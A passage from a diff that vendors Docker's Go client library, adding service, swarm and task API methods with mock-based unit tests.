} + } + + var response types.ServiceCreateResponse + resp, err := cli.post(ctx, "/services/create", nil, service, headers) + if err != nil { + return response, err + } + + err = json.NewDecoder(resp.body).Decode(&response) + ensureReaderClosed(resp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/service_create_test.go b/vendor/github.com/docker/docker/client/service_create_test.go new file mode 100644 index 0000000000..1e07382870 --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_create_test.go @@ -0,0 +1,57 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestServiceCreateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ServiceCreate(context.Background(), swarm.ServiceSpec{}, types.ServiceCreateOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestServiceCreate(t *testing.T) { + expectedURL := "/services/create" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + b, err := json.Marshal(types.ServiceCreateResponse{ + ID: "service_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + + r, err := client.ServiceCreate(context.Background(), swarm.ServiceSpec{}, types.ServiceCreateOptions{}) + if err != nil { + t.Fatal(err) + } + if r.ID != "service_id" { + t.Fatalf("expected `service_id`, got %s", r.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/service_inspect.go b/vendor/github.com/docker/docker/client/service_inspect.go new file mode 100644 index 0000000000..ca71cbde1a --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_inspect.go @@ -0,0 +1,33 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// ServiceInspectWithRaw returns the service information and the raw data. +func (cli *Client) ServiceInspectWithRaw(ctx context.Context, serviceID string) (swarm.Service, []byte, error) { + serverResp, err := cli.get(ctx, "/services/"+serviceID, nil, nil) + if err != nil { + if serverResp.statusCode == http.StatusNotFound { + return swarm.Service{}, nil, serviceNotFoundError{serviceID} + } + return swarm.Service{}, nil, err + } + defer ensureReaderClosed(serverResp) + + body, err := ioutil.ReadAll(serverResp.body) + if err != nil { + return swarm.Service{}, nil, err + } + + var response swarm.Service + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&response) + return response, body, err +} diff --git a/vendor/github.com/docker/docker/client/service_inspect_test.go b/vendor/github.com/docker/docker/client/service_inspect_test.go new file mode 100644 index 0000000000..e235cf0fef --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_inspect_test.go @@ -0,0 +1,65 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestServiceInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, _, err := client.ServiceInspectWithRaw(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestServiceInspectServiceNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, _, err := client.ServiceInspectWithRaw(context.Background(), "unknown") + if err == nil || !IsErrServiceNotFound(err) { + t.Fatalf("expected an serviceNotFoundError error, got %v", err) + } +} + +func TestServiceInspect(t *testing.T) { + expectedURL := "/services/service_id" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal(swarm.Service{ + ID: "service_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + serviceInspect, _, err := client.ServiceInspectWithRaw(context.Background(), "service_id") + if err != nil { + t.Fatal(err) + } + if serviceInspect.ID != "service_id" { + t.Fatalf("expected `service_id`, got %s", serviceInspect.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/service_list.go b/vendor/github.com/docker/docker/client/service_list.go new file mode 100644 index 0000000000..c29e6d407d --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_list.go @@ -0,0 +1,35 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// ServiceList returns the list of services. +func (cli *Client) ServiceList(ctx context.Context, options types.ServiceListOptions) ([]swarm.Service, error) { + query := url.Values{} + + if options.Filters.Len() > 0 { + filterJSON, err := filters.ToParam(options.Filters) + if err != nil { + return nil, err + } + + query.Set("filters", filterJSON) + } + + resp, err := cli.get(ctx, "/services", query, nil) + if err != nil { + return nil, err + } + + var services []swarm.Service + err = json.NewDecoder(resp.body).Decode(&services) + ensureReaderClosed(resp) + return services, err +} diff --git a/vendor/github.com/docker/docker/client/service_list_test.go b/vendor/github.com/docker/docker/client/service_list_test.go new file mode 100644 index 0000000000..213981ef70 --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_list_test.go @@ -0,0 +1,94 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestServiceListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.ServiceList(context.Background(), types.ServiceListOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestServiceList(t *testing.T) { + expectedURL := "/services" + + filters := filters.NewArgs() + filters.Add("label", "label1") + filters.Add("label", "label2") + + listCases := []struct { + options types.ServiceListOptions + expectedQueryParams map[string]string + }{ + { + options: types.ServiceListOptions{}, + expectedQueryParams: map[string]string{ + "filters": "", + }, + }, + { + options: types.ServiceListOptions{ + Filters: filters, + }, + expectedQueryParams: map[string]string{ + "filters": `{"label":{"label1":true,"label2":true}}`, + }, + }, + } + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range listCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + content, err := json.Marshal([]swarm.Service{ + { + ID: "service_id1", + }, + { + ID: "service_id2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + services, err := client.ServiceList(context.Background(), listCase.options) + if err != nil { + t.Fatal(err) + } + if len(services) != 2 { + t.Fatalf("expected 2 services, got %v", services) + } + } +} diff --git a/vendor/github.com/docker/docker/client/service_logs.go b/vendor/github.com/docker/docker/client/service_logs.go new file mode 100644 index 0000000000..24384e3ec0 --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_logs.go @@ -0,0 +1,52 @@ +package client + +import ( + "io" + "net/url" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + timetypes "github.com/docker/docker/api/types/time" +) + +// ServiceLogs returns the logs generated by a service in an io.ReadCloser. +// It's up to the caller to close the stream. +func (cli *Client) ServiceLogs(ctx context.Context, serviceID string, options types.ContainerLogsOptions) (io.ReadCloser, error) { + query := url.Values{} + if options.ShowStdout { + query.Set("stdout", "1") + } + + if options.ShowStderr { + query.Set("stderr", "1") + } + + if options.Since != "" { + ts, err := timetypes.GetTimestamp(options.Since, time.Now()) + if err != nil { + return nil, err + } + query.Set("since", ts) + } + + if options.Timestamps { + query.Set("timestamps", "1") + } + + if options.Details { + query.Set("details", "1") + } + + if options.Follow { + query.Set("follow", "1") + } + query.Set("tail", options.Tail) + + resp, err := cli.get(ctx, "/services/"+serviceID+"/logs", query, nil) + if err != nil { + return nil, err + } + return resp.body, nil +} diff --git a/vendor/github.com/docker/docker/client/service_logs_test.go b/vendor/github.com/docker/docker/client/service_logs_test.go new file mode 100644 index 0000000000..a6d002ba75 --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_logs_test.go @@ -0,0 +1,133 @@ +package client + +import ( + "bytes" + "fmt" + "io" + "io/ioutil" + "log" + "net/http" + "os" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + + "golang.org/x/net/context" +) + +func TestServiceLogsError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ServiceLogs(context.Background(), "service_id", types.ContainerLogsOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } + _, err = client.ServiceLogs(context.Background(), "service_id", types.ContainerLogsOptions{ + Since: "2006-01-02TZ", + }) + if err == nil || !strings.Contains(err.Error(), `parsing time "2006-01-02TZ"`) { + t.Fatalf("expected a 'parsing time' error, got %v", err) + } +} + +func TestServiceLogs(t *testing.T) { + expectedURL := "/services/service_id/logs" + cases := []struct { + options types.ContainerLogsOptions + expectedQueryParams map[string]string + }{ + { + expectedQueryParams: map[string]string{ + "tail": "", + }, + }, + { + options: types.ContainerLogsOptions{ + Tail: "any", + }, + expectedQueryParams: map[string]string{ + "tail": "any", + }, + }, + { + options: types.ContainerLogsOptions{ + ShowStdout: true, + ShowStderr: true, + Timestamps: true, + Details: true, + Follow: true, + }, + expectedQueryParams: map[string]string{ + "tail": "", + "stdout": "1", + "stderr": "1", + "timestamps": "1", + "details": "1", + "follow": "1", + }, + }, + { + options: types.ContainerLogsOptions{ + // An complete invalid date, timestamp or go duration will be + // passed as is + Since: "invalid but valid", + }, + expectedQueryParams: map[string]string{ + "tail": "", + "since": "invalid but valid", + }, + }, + } + for _, logCase := range cases { + client := &Client{ + client: newMockClient(func(r *http.Request) (*http.Response, error) { + if !strings.HasPrefix(r.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + } + // Check query parameters + query := r.URL.Query() + for key, expected := range logCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("response"))), + }, nil + }), + } + body, err := client.ServiceLogs(context.Background(), "service_id", logCase.options) + if err != nil { + t.Fatal(err) + } + defer body.Close() + content, err := ioutil.ReadAll(body) + if err != nil { + t.Fatal(err) + } + if string(content) != "response" { + t.Fatalf("expected response to contain 'response', got %s", string(content)) + } + } +} + +func ExampleClient_ServiceLogs_withTimeout() { + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + + client, _ := NewEnvClient() + reader, err := client.ServiceLogs(ctx, "service_id", types.ContainerLogsOptions{}) + if err != nil { + log.Fatal(err) + } + + _, err = io.Copy(os.Stdout, reader) + if err != nil && err != io.EOF { + log.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/service_remove.go b/vendor/github.com/docker/docker/client/service_remove.go new file mode 100644 index 0000000000..a9331f92c2 --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_remove.go @@ -0,0 +1,10 @@ +package client + +import "golang.org/x/net/context" + +// ServiceRemove kills and removes a service. +func (cli *Client) ServiceRemove(ctx context.Context, serviceID string) error { + resp, err := cli.delete(ctx, "/services/"+serviceID, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/service_remove_test.go b/vendor/github.com/docker/docker/client/service_remove_test.go new file mode 100644 index 0000000000..8e2ac259c1 --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_remove_test.go @@ -0,0 +1,47 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestServiceRemoveError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.ServiceRemove(context.Background(), "service_id") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestServiceRemove(t *testing.T) { + expectedURL := "/services/service_id" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "DELETE" { + return nil, fmt.Errorf("expected DELETE method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + err := client.ServiceRemove(context.Background(), "service_id") + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/service_update.go b/vendor/github.com/docker/docker/client/service_update.go new file mode 100644 index 0000000000..afa94d47e2 --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_update.go @@ -0,0 +1,41 @@ +package client + +import ( + "encoding/json" + "net/url" + "strconv" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// ServiceUpdate updates a Service. +func (cli *Client) ServiceUpdate(ctx context.Context, serviceID string, version swarm.Version, service swarm.ServiceSpec, options types.ServiceUpdateOptions) (types.ServiceUpdateResponse, error) { + var ( + headers map[string][]string + query = url.Values{} + ) + + if options.EncodedRegistryAuth != "" { + headers = map[string][]string{ + "X-Registry-Auth": {options.EncodedRegistryAuth}, + } + } + + if options.RegistryAuthFrom != "" { + query.Set("registryAuthFrom", options.RegistryAuthFrom) + } + + query.Set("version", strconv.FormatUint(version.Index, 10)) + + var response types.ServiceUpdateResponse + resp, err := cli.post(ctx, "/services/"+serviceID+"/update", query, service, headers) + if err != nil { + return response, err + } + + err = json.NewDecoder(resp.body).Decode(&response) + ensureReaderClosed(resp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/service_update_test.go b/vendor/github.com/docker/docker/client/service_update_test.go new file mode 100644 index 0000000000..76bea176bf --- /dev/null +++ b/vendor/github.com/docker/docker/client/service_update_test.go @@ -0,0 +1,77 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" +) + +func TestServiceUpdateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.ServiceUpdate(context.Background(), "service_id", swarm.Version{}, swarm.ServiceSpec{}, types.ServiceUpdateOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestServiceUpdate(t *testing.T) { + expectedURL := "/services/service_id/update" + + updateCases := []struct { + swarmVersion swarm.Version + expectedVersion string + }{ + { + expectedVersion: "0", + }, + { + swarmVersion: swarm.Version{ + Index: 0, + }, + expectedVersion: "0", + }, + { + swarmVersion: swarm.Version{ + Index: 10, + }, + expectedVersion: "10", + }, + } + + for _, updateCase := range updateCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + version := req.URL.Query().Get("version") + if version != updateCase.expectedVersion { + return nil, fmt.Errorf("version not set in URL query properly, expected '%s', got %s", updateCase.expectedVersion, version) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("{}"))), + }, nil + }), + } + + _, err := client.ServiceUpdate(context.Background(), "service_id", updateCase.swarmVersion, swarm.ServiceSpec{}, types.ServiceUpdateOptions{}) + if err != nil { + t.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go b/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go new file mode 100644 index 0000000000..be28d32628 --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go @@ -0,0 +1,21 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// SwarmGetUnlockKey retrieves the swarm's unlock key. +func (cli *Client) SwarmGetUnlockKey(ctx context.Context) (types.SwarmUnlockKeyResponse, error) { + serverResp, err := cli.get(ctx, "/swarm/unlockkey", nil, nil) + if err != nil { + return types.SwarmUnlockKeyResponse{}, err + } + + var response types.SwarmUnlockKeyResponse + err = json.NewDecoder(serverResp.body).Decode(&response) + ensureReaderClosed(serverResp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/swarm_init.go b/vendor/github.com/docker/docker/client/swarm_init.go new file mode 100644 index 0000000000..fd45d066e3 --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_init.go @@ -0,0 +1,21 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// SwarmInit initializes the Swarm. +func (cli *Client) SwarmInit(ctx context.Context, req swarm.InitRequest) (string, error) { + serverResp, err := cli.post(ctx, "/swarm/init", nil, req, nil) + if err != nil { + return "", err + } + + var response string + err = json.NewDecoder(serverResp.body).Decode(&response) + ensureReaderClosed(serverResp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/swarm_init_test.go b/vendor/github.com/docker/docker/client/swarm_init_test.go new file mode 100644 index 0000000000..811155aff4 --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_init_test.go @@ -0,0 +1,54 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/swarm" +) + +func TestSwarmInitError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.SwarmInit(context.Background(), swarm.InitRequest{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSwarmInit(t *testing.T) { + expectedURL := "/swarm/init" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(`"body"`))), + }, nil + }), + } + + resp, err := client.SwarmInit(context.Background(), swarm.InitRequest{ + ListenAddr: "0.0.0.0:2377", + }) + if err != nil { + t.Fatal(err) + } + if resp != "body" { + t.Fatalf("Expected 'body', got %s", resp) + } +} diff --git a/vendor/github.com/docker/docker/client/swarm_inspect.go b/vendor/github.com/docker/docker/client/swarm_inspect.go new file mode 100644 index 0000000000..6d95cfc05e --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_inspect.go @@ -0,0 +1,21 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// SwarmInspect inspects the Swarm. +func (cli *Client) SwarmInspect(ctx context.Context) (swarm.Swarm, error) { + serverResp, err := cli.get(ctx, "/swarm", nil, nil) + if err != nil { + return swarm.Swarm{}, err + } + + var response swarm.Swarm + err = json.NewDecoder(serverResp.body).Decode(&response) + ensureReaderClosed(serverResp) + return response, err +} diff --git a/vendor/github.com/docker/docker/client/swarm_inspect_test.go b/vendor/github.com/docker/docker/client/swarm_inspect_test.go new file mode 100644 index 0000000000..6432d172b4 --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_inspect_test.go @@ -0,0 +1,56 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestSwarmInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.SwarmInspect(context.Background()) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSwarmInspect(t *testing.T) { + expectedURL := "/swarm" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal(swarm.Swarm{ + ClusterInfo: swarm.ClusterInfo{ + ID: "swarm_id", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + swarmInspect, err := client.SwarmInspect(context.Background()) + if err != nil { + t.Fatal(err) + } + if swarmInspect.ID != "swarm_id" { + t.Fatalf("expected `swarm_id`, got %s", swarmInspect.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/swarm_join.go b/vendor/github.com/docker/docker/client/swarm_join.go new file mode 100644 index 0000000000..cda99930eb --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_join.go @@ -0,0 +1,13 @@ +package client + +import ( + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// SwarmJoin joins the Swarm. +func (cli *Client) SwarmJoin(ctx context.Context, req swarm.JoinRequest) error { + resp, err := cli.post(ctx, "/swarm/join", nil, req, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/swarm_join_test.go b/vendor/github.com/docker/docker/client/swarm_join_test.go new file mode 100644 index 0000000000..31ef2a76ee --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_join_test.go @@ -0,0 +1,51 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/swarm" +) + +func TestSwarmJoinError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.SwarmJoin(context.Background(), swarm.JoinRequest{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSwarmJoin(t *testing.T) { + expectedURL := "/swarm/join" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.SwarmJoin(context.Background(), swarm.JoinRequest{ + ListenAddr: "0.0.0.0:2377", + }) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/swarm_leave.go b/vendor/github.com/docker/docker/client/swarm_leave.go new file mode 100644 index 0000000000..a4df732174 --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_leave.go @@ -0,0 +1,18 @@ +package client + +import ( + "net/url" + + "golang.org/x/net/context" +) + +// SwarmLeave leaves the Swarm. +func (cli *Client) SwarmLeave(ctx context.Context, force bool) error { + query := url.Values{} + if force { + query.Set("force", "1") + } + resp, err := cli.post(ctx, "/swarm/leave", query, nil, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/swarm_leave_test.go b/vendor/github.com/docker/docker/client/swarm_leave_test.go new file mode 100644 index 0000000000..c96dac8120 --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_leave_test.go @@ -0,0 +1,66 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestSwarmLeaveError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.SwarmLeave(context.Background(), false) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSwarmLeave(t *testing.T) { + expectedURL := "/swarm/leave" + + leaveCases := []struct { + force bool + expectedForce string + }{ + { + expectedForce: "", + }, + { + force: true, + expectedForce: "1", + }, + } + + for _, leaveCase := range leaveCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + force := req.URL.Query().Get("force") + if force != leaveCase.expectedForce { + return nil, fmt.Errorf("force not set in URL query properly. expected '%s', got %s", leaveCase.expectedForce, force) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.SwarmLeave(context.Background(), leaveCase.force) + if err != nil { + t.Fatal(err) + } + } +} diff --git a/vendor/github.com/docker/docker/client/swarm_unlock.go b/vendor/github.com/docker/docker/client/swarm_unlock.go new file mode 100644 index 0000000000..addfb59f0a --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_unlock.go @@ -0,0 +1,17 @@ +package client + +import ( + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// SwarmUnlock unlockes locked swarm. +func (cli *Client) SwarmUnlock(ctx context.Context, req swarm.UnlockRequest) error { + serverResp, err := cli.post(ctx, "/swarm/unlock", nil, req, nil) + if err != nil { + return err + } + + ensureReaderClosed(serverResp) + return err +} diff --git a/vendor/github.com/docker/docker/client/swarm_update.go b/vendor/github.com/docker/docker/client/swarm_update.go new file mode 100644 index 0000000000..cc8eeb6554 --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_update.go @@ -0,0 +1,22 @@ +package client + +import ( + "fmt" + "net/url" + "strconv" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// SwarmUpdate updates the Swarm. +func (cli *Client) SwarmUpdate(ctx context.Context, version swarm.Version, swarm swarm.Spec, flags swarm.UpdateFlags) error { + query := url.Values{} + query.Set("version", strconv.FormatUint(version.Index, 10)) + query.Set("rotateWorkerToken", fmt.Sprintf("%v", flags.RotateWorkerToken)) + query.Set("rotateManagerToken", fmt.Sprintf("%v", flags.RotateManagerToken)) + query.Set("rotateManagerUnlockKey", fmt.Sprintf("%v", flags.RotateManagerUnlockKey)) + resp, err := cli.post(ctx, "/swarm/update", query, swarm, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/swarm_update_test.go b/vendor/github.com/docker/docker/client/swarm_update_test.go new file mode 100644 index 0000000000..3b23db078f --- /dev/null +++ b/vendor/github.com/docker/docker/client/swarm_update_test.go @@ -0,0 +1,49 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/swarm" +) + +func TestSwarmUpdateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.SwarmUpdate(context.Background(), swarm.Version{}, swarm.Spec{}, swarm.UpdateFlags{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestSwarmUpdate(t *testing.T) { + expectedURL := "/swarm/update" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte(""))), + }, nil + }), + } + + err := client.SwarmUpdate(context.Background(), swarm.Version{}, swarm.Spec{}, swarm.UpdateFlags{}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/client/task_inspect.go b/vendor/github.com/docker/docker/client/task_inspect.go new file mode 100644 index 0000000000..bc8058fc32 --- /dev/null +++ b/vendor/github.com/docker/docker/client/task_inspect.go @@ -0,0 +1,34 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + + "github.com/docker/docker/api/types/swarm" + + "golang.org/x/net/context" +) + +// TaskInspectWithRaw returns the task information and its raw representation.. +func (cli *Client) TaskInspectWithRaw(ctx context.Context, taskID string) (swarm.Task, []byte, error) { + serverResp, err := cli.get(ctx, "/tasks/"+taskID, nil, nil) + if err != nil { + if serverResp.statusCode == http.StatusNotFound { + return swarm.Task{}, nil, taskNotFoundError{taskID} + } + return swarm.Task{}, nil, err + } + defer ensureReaderClosed(serverResp) + + body, err := 